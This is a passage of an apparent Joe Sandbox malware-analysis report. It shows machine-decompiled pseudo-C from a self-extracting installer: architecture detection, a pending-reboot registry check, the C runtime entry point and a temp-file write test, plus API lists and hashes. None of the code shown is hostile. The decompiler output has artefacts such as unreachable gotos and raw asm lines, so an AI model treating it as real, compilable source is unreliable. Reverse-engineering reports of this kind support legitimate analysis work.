                                                                        				_t48 = 0xf391e4;
                                                                        				E00F31781(0xf391e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0xf39a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E00F3658A(_t48, 0x104, 0xf31140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E00F3658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}




















                                                                        0x00f35472
                                                                        0x00f35479
                                                                        0x00f35481
                                                                        0x00f35484
                                                                        0x00f3551c
                                                                        0x00f35521
                                                                        0x00f35528
                                                                        0x00f3552d
                                                                        0x00f3552f
                                                                        0x00f35539
                                                                        0x00f3554d
                                                                        0x00f3554d
                                                                        0x00f35552
                                                                        0x00f35585
                                                                        0x00f35585
                                                                        0x00f3558b
                                                                        0x00f3558d
                                                                        0x00f3559d
                                                                        0x00f3559d
                                                                        0x00f35557
                                                                        0x00f3555e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35560
                                                                        0x00f35566
                                                                        0x00f35569
                                                                        0x00f3556f
                                                                        0x00f3556f
                                                                        0x00f35581
                                                                        0x00f35581
                                                                        0x00000000
                                                                        0x00f35581
                                                                        0x00f35545
                                                                        0x00f3557c
                                                                        0x00000000
                                                                        0x00f3557c
                                                                        0x00f35547
                                                                        0x00000000
                                                                        0x00f35547
                                                                        0x00f3548a
                                                                        0x00f35490
                                                                        0x00f35497
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3549d
                                                                        0x00f354ab
                                                                        0x00f354b4
                                                                        0x00f354c0
                                                                        0x00f3550c
                                                                        0x00f35511
                                                                        0x00f35515
                                                                        0x00000000
                                                                        0x00f35515
                                                                        0x00f354c9
                                                                        0x00f354d6
                                                                        0x00f354d8
                                                                        0x00f354fe
                                                                        0x00f35503
                                                                        0x00f35507
                                                                        0x00000000
                                                                        0x00f35507
                                                                        0x00f354da
                                                                        0x00f354dd
                                                                        0x00f354f7
                                                                        0x00000000
                                                                        0x00f354f7
                                                                        0x00f354df
                                                                        0x00f354e2
                                                                        0x00f354f0
                                                                        0x00000000
                                                                        0x00f354f0
                                                                        0x00f354e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f354e9
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F354C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3556F
                                                                          • Part of subcall function 00F353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F353FB
                                                                          • Part of subcall function 00F353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35402
                                                                          • Part of subcall function 00F353A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3541F
                                                                          • Part of subcall function 00F353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3542B
                                                                          • Part of subcall function 00F353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-4535649
                                                                        • Opcode ID: 7f03e25f85b0b63b1eae187042d6ca14dd58b4610852eaa2f4b9296f9c7d4c6d
                                                                        • Instruction ID: 3ed59096674eeb78ab7a14ea52c63fa903b03ec721b413abd40f816d93241a38
                                                                        • Opcode Fuzzy Hash: 7f03e25f85b0b63b1eae187042d6ca14dd58b4610852eaa2f4b9296f9c7d4c6d
                                                                        • Instruction Fuzzy Hash: BA310871F00A046BCF54AF259C456BE779BBBC1B74F08012AE442D7240DBB8DE05B691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 f3256d-f3257d 520 f32583-f32589 519->520 521 f32622-f32627 call f324e0 519->521 523 f3258b 520->523 524 f325e8-f32607 RegOpenKeyExA 520->524 529 f32629-f3262f 521->529 528 f32591-f32595 523->528 523->529 525 f325e3-f325e6 524->525 526 f32609-f32620 RegQueryInfoKeyA 524->526 525->529 530 f325d1-f325dd RegCloseKey 526->530 528->529 531 f3259b-f325ba RegOpenKeyExA 528->531 530->525 531->525 532 f325bc-f325cb RegQueryValueExA 531->532 532->530
                                                                        C-Code - Quality: 86%
                                                                        			E00F3256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E00F324E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}











                                                                        0x00f32572
                                                                        0x00f32573
                                                                        0x00f32575
                                                                        0x00f32578
                                                                        0x00f3257d
                                                                        0x00f32627
                                                                        0x00f32583
                                                                        0x00f32586
                                                                        0x00f32589
                                                                        0x00f325eb
                                                                        0x00f32607
                                                                        0x00000000
                                                                        0x00f32609
                                                                        0x00f3261a
                                                                        0x00000000
                                                                        0x00f3261a
                                                                        0x00000000
                                                                        0x00f3258b
                                                                        0x00f3258b
                                                                        0x00f3259e
                                                                        0x00f325b2
                                                                        0x00f325ba
                                                                        0x00f325cb
                                                                        0x00f325d1
                                                                        0x00f325d6
                                                                        0x00f325da
                                                                        0x00f325dd
                                                                        0x00f325dd
                                                                        0x00f325e3
                                                                        0x00f325e3
                                                                        0x00f325e3
                                                                        0x00f3258b
                                                                        0x00f32589
                                                                        0x00f3262f
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00F34096,00F34096,?,00F31ED3,00000001,00000000,?,?,00F34137,?), ref: 00F325B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F34096,?,00F31ED3,00000001,00000000,?,?,00F34137,?,00F34096), ref: 00F325CB
                                                                        • RegCloseKey.KERNELBASE(?,?,00F31ED3,00000001,00000000,?,?,00F34137,?,00F34096), ref: 00F325DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00F34096,00F34096,?,00F31ED3,00000001,00000000,?,?,00F34137,?), ref: 00F325FF
                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00F34096,00000000,00000000,00000000,00000000,?,00F31ED3,00000001,00000000), ref: 00F3261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00F325A8
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F325F5
                                                                        • PendingFileRenameOperations, xrefs: 00F325C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: a69f69c42e7c1e748b1ad38ef6a297c498b4fdef57b236ec8b323a9e50ff31a9
                                                                        • Instruction ID: d4c6ca512c67857df642781a9207db5d674aa95d28c01e1b7415723cbb3a20a1
                                                                        • Opcode Fuzzy Hash: a69f69c42e7c1e748b1ad38ef6a297c498b4fdef57b236ec8b323a9e50ff31a9
                                                                        • Instruction Fuzzy Hash: 97118CB5D02228BB9B64DB929C0ADFBBE7CEF117B1F144055B848A2100DB709F45F6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 533 f36a60-f36a91 call f37155 call f37208 GetStartupInfoW 539 f36a93-f36aa2 533->539 540 f36aa4-f36aa6 539->540 541 f36abc-f36abe 539->541 543 f36aa8-f36aad 540->543 544 f36aaf-f36aba Sleep 540->544 542 f36abf-f36ac5 541->542 545 f36ad1-f36ad7 542->545 546 f36ac7-f36acf _amsg_exit 542->546 543->542 544->539 548 f36b05 545->548 549 f36ad9-f36ae9 call f36c3f 545->549 547 f36b0b-f36b11 546->547 551 f36b13-f36b24 _initterm 547->551 552 f36b2e-f36b30 547->552 548->547 553 f36aee-f36af2 549->553 551->552 554 f36b32-f36b39 552->554 555 f36b3b-f36b42 552->555 553->547 556 f36af4-f36b00 553->556 554->555 557 f36b67-f36b71 555->557 558 f36b44-f36b51 call f37060 555->558 560 f36c39-f36c3e call f3724d 556->560 559 f36b74-f36b79 557->559 558->557 566 f36b53-f36b65 558->566 563 f36bc5-f36bc8 559->563 564 f36b7b-f36b7d 559->564 567 f36bd6-f36be3 _ismbblead 563->567 568 f36bca-f36bd3 563->568 569 f36b94-f36b98 564->569 570 f36b7f-f36b81 564->570 566->557 572 f36be5-f36be6 567->572 573 f36be9-f36bed 567->573 568->567 575 f36ba0-f36ba2 569->575 576 f36b9a-f36b9e 569->576 570->563 574 f36b83-f36b85 570->574 572->573 573->559 574->569 578 f36b87-f36b8a 574->578 579 f36ba3-f36bbc call f32bfb 575->579 576->579 578->569 581 f36b8c-f36b92 578->581 583 f36c1e-f36c25 579->583 584 f36bbe-f36bbf exit 579->584 581->574 585 f36c32 583->585 586 f36c27-f36c2d _cexit 583->586 584->563 585->560 586->585
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E00F37155();
                                                                        				_push(0x58);
                                                                        				_push(0xf372b8);
                                                                        				E00F37208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0xf388b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0xf388b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0xf381e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0xf388b0 = _t58;
                                                                        							_t37 = E00F36C3F(0xf310b8, 0xf310c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L00F36FF4();
                                                                        						L13:
                                                                        						_t68 =  *0xf388b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0xf310b4);
                                                                        							_push(0xf310ac);
                                                                        							L00F37202();
                                                                        							 *0xf388b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0xf388ac = 0;
                                                                        						}
                                                                        						_t71 =  *0xf388b4;
                                                                        						if( *0xf388b4 != 0 && E00F37060(_t71, 0xf388b4) != 0) {
                                                                        							_t60 =  *0xf388b4; // 0x0
                                                                        							 *0xf3a288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E00F32BFB(0xf30000, 0, _t59); // executed
                                                                        							 *0xf381e0 = _t30;
                                                                        							__eflags =  *0xf381f8;
                                                                        							if( *0xf381f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0xf381e4;
                                                                        							if( *0xf381e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0xf381e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E00F3724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}


















                                                                        0x00f36a60
                                                                        0x00f36a6a
                                                                        0x00f36a6c
                                                                        0x00f36a71
                                                                        0x00f36a78
                                                                        0x00f36a7f
                                                                        0x00f36a85
                                                                        0x00f36a8e
                                                                        0x00f36a91
                                                                        0x00f36a93
                                                                        0x00f36a9c
                                                                        0x00f36aa2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f36aa6
                                                                        0x00f36ab4
                                                                        0x00000000
                                                                        0x00f36aa8
                                                                        0x00f36aaa
                                                                        0x00f36aab
                                                                        0x00f36aab
                                                                        0x00f36abf
                                                                        0x00f36abf
                                                                        0x00f36ac5
                                                                        0x00f36ad1
                                                                        0x00f36ad7
                                                                        0x00f36b05
                                                                        0x00000000
                                                                        0x00f36ad9
                                                                        0x00f36ad9
                                                                        0x00f36ae9
                                                                        0x00f36af0
                                                                        0x00f36af2
                                                                        0x00000000
                                                                        0x00f36af4
                                                                        0x00f36af4
                                                                        0x00f36afb
                                                                        0x00f36afb
                                                                        0x00f36af2
                                                                        0x00f36ac7
                                                                        0x00f36ac7
                                                                        0x00f36ac9
                                                                        0x00f36b0b
                                                                        0x00f36b0b
                                                                        0x00f36b11
                                                                        0x00f36b13
                                                                        0x00f36b18
                                                                        0x00f36b1d
                                                                        0x00f36b24
                                                                        0x00f36b24
                                                                        0x00f36b30
                                                                        0x00f36b39
                                                                        0x00f36b39
                                                                        0x00f36b3b
                                                                        0x00f36b42
                                                                        0x00f36b57
                                                                        0x00f36b5f
                                                                        0x00f36b65
                                                                        0x00f36b65
                                                                        0x00f36b67
                                                                        0x00f36b6c
                                                                        0x00f36b6e
                                                                        0x00f36b71
                                                                        0x00f36b74
                                                                        0x00f36b74
                                                                        0x00f36b79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f36b7d
                                                                        0x00f36b81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f36b83
                                                                        0x00f36b8c
                                                                        0x00f36b8d
                                                                        0x00f36b90
                                                                        0x00f36b90
                                                                        0x00f36b83
                                                                        0x00f36b81
                                                                        0x00f36b94
                                                                        0x00f36b98
                                                                        0x00f36ba2
                                                                        0x00f36b9a
                                                                        0x00f36b9a
                                                                        0x00f36b9a
                                                                        0x00f36ba3
                                                                        0x00f36bab
                                                                        0x00f36bb0
                                                                        0x00f36bb5
                                                                        0x00f36bbc
                                                                        0x00f36bbf
                                                                        0x00000000
                                                                        0x00f36bbf
                                                                        0x00f36c1e
                                                                        0x00f36c25
                                                                        0x00f36c27
                                                                        0x00f36c2d
                                                                        0x00f36c2d
                                                                        0x00f36c32
                                                                        0x00000000
                                                                        0x00f36bc5
                                                                        0x00f36bc5
                                                                        0x00f36bc8
                                                                        0x00f36bcc
                                                                        0x00f36bce
                                                                        0x00f36bce
                                                                        0x00f36bd1
                                                                        0x00f36bd3
                                                                        0x00f36bd3
                                                                        0x00f36bd6
                                                                        0x00f36bda
                                                                        0x00f36be1
                                                                        0x00f36be3
                                                                        0x00f36be5
                                                                        0x00f36be5
                                                                        0x00f36be6
                                                                        0x00f36be6
                                                                        0x00f36be9
                                                                        0x00f36bea
                                                                        0x00f36bea
                                                                        0x00f36b74
                                                                        0x00f36c39
                                                                        0x00f36c3e
                                                                        0x00f36c3e
                                                                        0x00f36abe
                                                                        0x00f36abe
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F37155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F37182
                                                                          • Part of subcall function 00F37155: GetCurrentProcessId.KERNEL32 ref: 00F37191
                                                                          • Part of subcall function 00F37155: GetCurrentThreadId.KERNEL32 ref: 00F3719A
                                                                          • Part of subcall function 00F37155: GetTickCount.KERNEL32 ref: 00F371A3
                                                                          • Part of subcall function 00F37155: QueryPerformanceCounter.KERNEL32(?), ref: 00F371B8
                                                                        • GetStartupInfoW.KERNEL32(?,00F372B8,00000058), ref: 00F36A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00F36AB4
                                                                        • _amsg_exit.MSVCRT ref: 00F36AC9
                                                                        • _initterm.MSVCRT ref: 00F36B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F36B49
                                                                        • exit.KERNELBASE ref: 00F36BBF
                                                                        • _ismbblead.MSVCRT ref: 00F36BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 147df4b3bb82d547ba7432e5c0247cc0cb8bfce553d47526182dba69938d38d0
                                                                        • Instruction ID: 01a0cf62179697f87c2ed5ea5047708616ee9071bfda85cfd6205bb8d24ff13b
                                                                        • Opcode Fuzzy Hash: 147df4b3bb82d547ba7432e5c0247cc0cb8bfce553d47526182dba69938d38d0
                                                                        • Instruction Fuzzy Hash: 8041D571D48328EBDB21AB68DC0576AB7E5FB84771F24811AF841E7290CB788942BF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 f358c8-f358d5 588 f358d8-f358dd 587->588 588->588 589 f358df-f358f1 LocalAlloc 588->589 590 f358f3-f35901 call f344b9 589->590 591 f35919-f35959 call f31680 call f3658a CreateFileA LocalFree 589->591 594 f35906-f35910 call f36285 590->594 591->594 601 f3595b-f3596c CloseHandle GetFileAttributesA 591->601 600 f35912-f35918 594->600 601->594 602 f3596e-f35970 601->602 602->594 603 f35972-f3597b 602->603 603->600
                                                                        C-Code - Quality: 95%
                                                                        			E00F358C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E00F31680(_t20, _t36, _t33);
                                                                        					E00F3658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0xf39124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0xf39124 = E00F36285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}













                                                                        0x00f358cd
                                                                        0x00f358d1
                                                                        0x00f358d3
                                                                        0x00f358d5
                                                                        0x00f358d8
                                                                        0x00f358d8
                                                                        0x00f358da
                                                                        0x00f358db
                                                                        0x00f358e1
                                                                        0x00f358ed
                                                                        0x00f358f1
                                                                        0x00f3591e
                                                                        0x00f3592c
                                                                        0x00f35943
                                                                        0x00f3594a
                                                                        0x00f3594d
                                                                        0x00f35953
                                                                        0x00f35959
                                                                        0x00000000
                                                                        0x00f3595b
                                                                        0x00f3595c
                                                                        0x00f35963
                                                                        0x00f3596c
                                                                        0x00000000
                                                                        0x00f35972
                                                                        0x00f35974
                                                                        0x00f3597a
                                                                        0x00f3597a
                                                                        0x00f3596c
                                                                        0x00f358f3
                                                                        0x00f35901
                                                                        0x00f35906
                                                                        0x00f3590b
                                                                        0x00f35910
                                                                        0x00f35910
                                                                        0x00f35918

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F358E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35943
                                                                        • LocalFree.KERNEL32(00000000,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3594D
                                                                        • CloseHandle.KERNEL32(00000000,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F35534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
